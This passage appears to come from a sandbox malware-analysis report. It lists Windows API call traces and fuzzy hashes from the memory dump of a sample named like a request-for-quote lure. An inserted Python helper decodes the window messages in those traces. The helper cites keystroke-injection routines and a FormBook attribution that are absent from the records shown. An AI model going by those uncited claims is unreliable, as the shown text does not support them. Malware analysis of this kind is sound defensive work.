• Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
APIs
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
• Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
• Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
• VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
• VariantClear.OLEAUT32(-00000058), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• String ID:
• API String ID: 4189319755-0
• Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
• Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
• Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
APIs
• ShowWindow.USER32(?,00000000), ref: 00440A8A
• EnableWindow.USER32(?,00000000), ref: 00440AAF
• ShowWindow.USER32(?,00000000), ref: 00440B18
• ShowWindow.USER32(?,00000004), ref: 00440B2B
• EnableWindow.USER32(?,00000001), ref: 00440B50
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
• Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
• Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
• Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
Strings
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Variant$Copy$ClearErrorLast
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 2487901850-572801152
• Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
• Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
• Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
• Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
APIs
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Window$Enable$Show$MessageSend
• String ID:
• API String ID: 1871949834-0
• Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
• Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
• Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
• Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
• Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
• Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
• Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
• SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
• ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
• SendMessageW.USER32 ref: 00471AE3
• DestroyIcon.USER32(?), ref: 00471AF4
Memory Dump Source
• Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
Similarity
• API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
• String ID:
• API String ID: 3611059338-0
• Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
• Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
• Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
• Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
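The "APIs" lists in the records above give raw hexadecimal arguments, so the window messages behind the SendMessageW/PostMessageW calls in the routines at 0044C570 (GetKeyboardState, SetKeyboardState, three PostMessageW calls and SendInput), 0044908B, 0044881F, 00440B75 and 00471A45 are not readable as printed. The following script is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses reference lines of the form shown on this page, decodes the message argument against a small, constructed table limited to IDs that occur in these records (values taken from the public winuser.h/commctrl.h headers), and reads the cbSize passed to SendInput. The sample input is copied from the records above. Two caveats the decoding makes visible: a message at or above WM_USER (0x0400) is control-specific and cannot be named without knowing the target window class, which the report does not record (0x0409 is therefore left undecoded), and the 0x1C (28) passed as cbSize to SendInput is sizeof(INPUT) for 32-bit code, which is consistent with the 00400000 image base but says nothing about what the synthesized keystrokes target. These routines (message plumbing, VariantCopy, "NULL Pointer assignment" strings) read as framework or runtime code inside the loader rather than as the behaviour the report's signatures attribute to FormBook; that is an assessment, not something the records state.

```python
"""Parse Joe Sandbox 'APIs' reference lines and decode window-message arguments.

Added example; not part of the Joe Sandbox report. The sample lines are copied
from the function records on this page; the message table is partial.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: reference lines copied from the records above
# (0044C570 keystroke routine, 0044908B/0044881F/00471A45 control routines,
# plus one OLEAUT32 call whose argument the report prints as negative).
SAMPLE_LINES = """
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
• SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
• SendMessageW.USER32 ref: 00471AE3
• VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
"""

WM_USER = 0x0400
# Partial table: only IDs that occur in the records above (winuser.h / commctrl.h).
MESSAGE_NAMES = {
    0x00F0: "BM_GETCHECK",
    0x00F1: "BM_SETCHECK",
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN",
    0x0105: "WM_SYSKEYUP",
    0x1024: "LVM_SETTEXTCOLOR",  # LVM_FIRST (0x1000) + 36
    0x111E: "TVM_SETTEXTCOLOR",  # TV_FIRST  (0x1100) + 30
    0x1303: "TCM_SETIMAGELIST",  # TCM_FIRST (0x1300) + 3
    0x130C: "TCM_SETCURSEL",     # TCM_FIRST (0x1300) + 12
}
MESSAGE_FUNCS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}

# "• Func.MODULE(arg,arg,...), ref: 0044C5D5" or "• Func.MODULE ref: 00471AE3"
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<func>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiRef:
    func: str
    module: str
    args: List[Optional[int]]   # None where the report prints '?'
    ref: int                    # call-site address
    message: Optional[str] = None


def decode_message(msg: int) -> str:
    name = MESSAGE_NAMES.get(msg)
    if name:
        return name
    if msg >= WM_USER:
        # Control-specific: needs the target window class to decode further.
        return f"control-specific (WM_USER+0x{msg - WM_USER:X})"
    return f"unknown (0x{msg:04X})"


def parse_line(line: str) -> Optional[ApiRef]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # int(x, 16) keeps the sign the report prints for negative values.
    args = [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")] if raw else []
    ref = ApiRef(m.group("func"), m.group("module"), args, int(m.group("ref"), 16))
    if ref.func in MESSAGE_FUNCS and len(args) > 1 and args[1] is not None:
        ref.message = decode_message(args[1])
    return ref


def parse_block(text: str) -> List[ApiRef]:
    return [r for r in map(parse_line, text.splitlines()) if r is not None]


def sendinput_struct_size(refs: List[ApiRef]) -> Optional[int]:
    """cbSize passed to SendInput: sizeof(INPUT) is 28 on x86 and 40 on x64."""
    for r in refs:
        if r.func == "SendInput" and len(r.args) == 3:
            return r.args[2]
    return None


def summarize(refs: List[ApiRef]) -> List[str]:
    return [f"{r.ref:08X} {r.func}" + (f" -> {r.message}" if r.message else "")
            for r in refs]


if __name__ == "__main__":
    refs = parse_block(SAMPLE_LINES)
    print("\n".join(summarize(refs)))
    print("SendInput cbSize:", sendinput_struct_size(refs))
```

Run it as-is to see the decoded listing for the sample, or paste any record's "APIs" lines into SAMPLE_LINES. Extending MESSAGE_NAMES is the only change needed to cover other records; keep control-specific IDs tied to the control they belong to, since the same value above WM_USER means different things to a list view, a tree view and a tab control.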
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: DestroyWindow$DeleteObject$IconMove
                                                        APIs
                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                        • _wcslen.LIBCMT ref: 004438CD
                                                        • _wcslen.LIBCMT ref: 004438E6
                                                        • _wcstok.LIBCMT ref: 004438F8
                                                        • _wcslen.LIBCMT ref: 0044390C
                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                        • _wcstok.LIBCMT ref: 00443931
                                                        Similarity
                                                        • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                        APIs
                                                        Similarity
                                                        • API ID: Destroy$DeleteMenuObject$IconWindow
                                                        APIs
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                        APIs
                                                        Similarity
                                                        • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                        APIs
                                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        APIs
                                                        • SendMessageW.USER32 ref: 004555C7
                                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                        Similarity
                                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                        APIs
                                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                                        • EndPath.GDI32(?), ref: 004472D6
                                                        • StrokePath.GDI32(?), ref: 004472E4
                                                        Similarity
                                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        APIs
                                                        • __getptd.LIBCMT ref: 0041708E
                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                        • __amsg_exit.LIBCMT ref: 004170AE
                                                        • __lock.LIBCMT ref: 004170BE
                                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                        • _free.LIBCMT ref: 004170EE
                                                        • InterlockedIncrement.KERNEL32(03012CF8), ref: 00417106
                                                        Similarity
                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                        APIs
                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                        • ExitThread.KERNEL32 ref: 004151ED
